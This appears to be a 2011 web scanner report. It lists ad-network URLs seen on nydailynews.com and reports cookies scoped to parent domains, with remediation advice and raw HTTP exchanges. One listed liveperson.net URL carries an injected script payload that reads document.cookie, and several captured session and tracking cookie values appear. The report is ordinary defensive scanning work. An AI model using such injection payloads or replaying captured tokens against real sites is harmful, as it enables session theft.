http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk
http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://ad.afy11.net/ad
http://ad.doubleclick.net/click
http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://base.liveperson.net/hc/5296924/
https://base.liveperson.net/hc/5296924/
https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.chango.com/collector/tag.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js
http://cbs6albany.oodle.com/
http://cbs6albany.oodle.com/pro/fb-follow/
http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js
http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js
http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js
http://d7.zedo.com/img/bh.gif
http://d7.zedo.com/utils/ecSet.js
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj
http://ib.adnxs.com/ab
http://ib.adnxs.com/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html
http://ib.adnxs.com/getuid
http://ib.adnxs.com/getuidnb
http://ib.adnxs.com/getuidu
http://ib.adnxs.com/mapuid
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ttj
http://media.fastclick.net/w/click.here
http://media.fastclick.net/w/get.media
http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
http://syndication.mmismm.com/mmtnt.php
http://tag.contextweb.com/TAGPUBLISH/getad.aspx
http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
http://tap.rubiconproject.com/oz/sensor
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl
http://voken.eyereturn.com/
http://voken.eyereturn.com/
http://voken.eyereturn.com/pb/get
http://voken.eyereturn.com/pix
http://xads.zedo.com/ads2/c

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.nydailynews.com
Path:	/blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.2. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.nydailynews.com
Path:	/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aBnEV8qZbaO5AiPqlfEMlMp0CrY1VMO6DaxPZc430eDivvFS7bYquWjKWsEyoRZbWhm4HfJyiRUg8218umR6KSGZbrssC9JqkYBZdGOqnZcdQ0bEH1RhMnrgAKNi7tStd4DLn17NIOFpIlovT7JKoB6FfMbXjOum0y8htmV9BK4rXGvOOt2gohZaOZb1BUoF8U0MBLq85Ys9LJ8paIxGC1Y6O1y3XVZaaBJRO5a4kg8GZc4q60WBbrdEt8DAgNgdcdSchZbyWE6xZckgGgNZcZaAG3jZcGxQ6Oi8s5UHYM9f5OhZcRcGqanCGSmdp8oFwF3msZcng9YBbvZbVJXeTheW3fZb7nKtOqZb91SWJNBSOLUN7MOOHGISOhYq0wZcIKNxydoZdor6WIaGIGWQXSDVxPQgp1lDHSQq29ly7CiTxU58Zd7TGTGCVjWrb39CkZaZaVZc4E9PS8BrVtmxq4vcSFl4KbDCmeveWiPMQExZdCAuhsidGAcbnQZcvwy6HdTRUWHSNWVTPPlZcWd5PpJM3gvYsbM2K2vRXobaAZbZarGcVaH4BRuQgRf2ZcsiMpaI7VFcFLFo7wCXqNZdTroL5ZdvbW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:32 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aBnEV8qZbaO5AiPqlfEMlMp0CrY1VMO6DaxPZc430eDivvFS7bYquWjKWsEyoRZbWhm4HfJyiRUg8218umR6KSGZbrssC9JqkYBZdGOqnZcdQ0bEH1RhMnrgAKNi7tStd4DLn17NIOFpIlovT7JKoB6FfMbXjOum0y8htmV9BK4rXGvOOt2gohZaOZb1BUoF8U0MBLq85Ys9LJ8paIxGC1Y6O1y3XVZaaBJRO5a4kg8GZc4q60WBbrdEt8DAgNgdcdSchZbyWE6xZckgGgNZcZaAG3jZcGxQ6Oi8s5UHYM9f5OhZcRcGqanCGSmdp8oFwF3msZcng9YBbvZbVJXeTheW3fZb7nKtOqZb91SWJNBSOLUN7MOOHGISOhYq0wZcIKNxydoZdor6WIaGIGWQXSDVxPQgp1lDHSQq29ly7CiTxU58Zd7TGTGCVjWrb39CkZaZaVZc4E9PS8BrVtmxq4vcSFl4KbDCmeveWiPMQExZdCAuhsidGAcbnQZcvwy6HdTRUWHSNWVTPPlZcWd5PpJM3gvYsbM2K2vRXobaAZbZarGcVaH4BRuQgRf2ZcsiMpaI7VFcFLFo7wCXqNZdTroL5ZdvbW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aknDc2tliMZc6Jq3DJejYVRXks2ZdIIWFZchKUTZbeGyBxqshH68M7kQS9im3XFZbmGmAZbalcqqWdniQu9QQ42kafOZa7iirBZcOF7Zc2GtEwqGKGZb8ycb8xUAMqD9xZd3p21ENgWL1F3u9vabhfoTGIWZc8dlZcw7Wg01MGsG4F3VVUM4xohgabZcisBDZbrHZcSeFrpuKPH2hgFBRscs8R9C4ZbXIJXRy6ZcTWdyLlSxmS1XZaZdGs7bWRFy6Ukcoq3dvdLfCFGZcNGYwTvBlVKg3qKZbLk3GyPrfdCy5ap8yS9KXmDy7Vpi7r2a4BZdmOibIRKZb1dgZaZb0pRyCTnsxBZatBWgDAXNNr995VLCFoPotEFaSokGZdafO7d5yklT67yN5c6JKRcAeLfsbu0enSMAvnlyb5Zd2Jf1eeXGDZaJirHZdhTi9WpZd19b8csfERi10Za1yHZaFZbnVWJmvSKd82ZabcjWZaLKfB8mttG5Zc9MM7AgQI1iOonV0DRwAtZbY8NwNP6ZcnaIVcS96V8MBdLXZcY0LZcoPlRYeRP1DmtivqWV1GOZcO06J3ZbqZbJhX6Pffu7ZcWV3T79WA9iS9; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:51 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aknDc2tliMZc6Jq3DJejYVRXks2ZdIIWFZchKUTZbeGyBxqshH68M7kQS9im3XFZbmGmAZbalcqqWdniQu9QQ42kafOZa7iirBZcOF7Zc2GtEwqGKGZb8ycb8xUAMqD9xZd3p21ENgWL1F3u9vabhfoTGIWZc8dlZcw7Wg01MGsG4F3VVUM4xohgabZcisBDZbrHZcSeFrpuKPH2hgFBRscs8R9C4ZbXIJXRy6ZcTWdyLlSxmS1XZaZdGs7bWRFy6Ukcoq3dvdLfCFGZcNGYwTvBlVKg3qKZbLk3GyPrfdCy5ap8yS9KXmDy7Vpi7r2a4BZdmOibIRKZb1dgZaZb0pRyCTnsxBZatBWgDAXNNr995VLCFoPotEFaSokGZdafO7d5yklT67yN5c6JKRcAeLfsbu0enSMAvnlyb5Zd2Jf1eeXGDZaJirHZdhTi9WpZd19b8csfERi10Za1yHZaFZbnVWJmvSKd82ZabcjWZaLKfB8mttG5Zc9MM7AgQI1iOonV0DRwAtZbY8NwNP6ZcnaIVcS96V8MBdLXZcY0LZcoPlRYeRP1DmtivqWV1GOZcO06J3ZbqZbJhX6Pffu7ZcWV3T79WA9iS9; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:51 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aOnh31SyZaaguIvQ9UN6ORsZbuleis79XItmZb0P8atB8OjAkU8xKhtbdD6bHZaVnI2TUCe4Zd4PpZb7wHXCZaZbPZdqZdO6mo7JbLZd3xuwbZbHN538buNduG2L81ZaY5pX32oqSqf2x7N6kcPdHSVDe06Zbo85Yn01rbZbQrwZbFpMcjDq6PZaumkobfFsGD5yHWK3SNZc9eWIZbZc53SxWq1pme8CV90Nq6CBimgf4finNqZaZdpEHlnXDX1gEuqUPhN9I1mG3QkTEldbEb2stXISNA8y56Rry2JU3teeA5JyEAAKrqMmOd64bu6BZctFcu2lR2XJSV9BoymIjg3mhHZbqWlQKoZd9NcrCiAZajj2cywhZcaGo4iX5Eo8ZaUcLRUM2p7K1A3bCDJl3AYKTXTUtTBZaZdxJABe2b1xOqBGZanyrnrybc6ZcZdJKV2mpmxtZdPHVDMtNDKEnmxaeDZaDLLyY8UNVQnSYDt2FIdJvwP5myVZaGNRTZag8; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:35 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
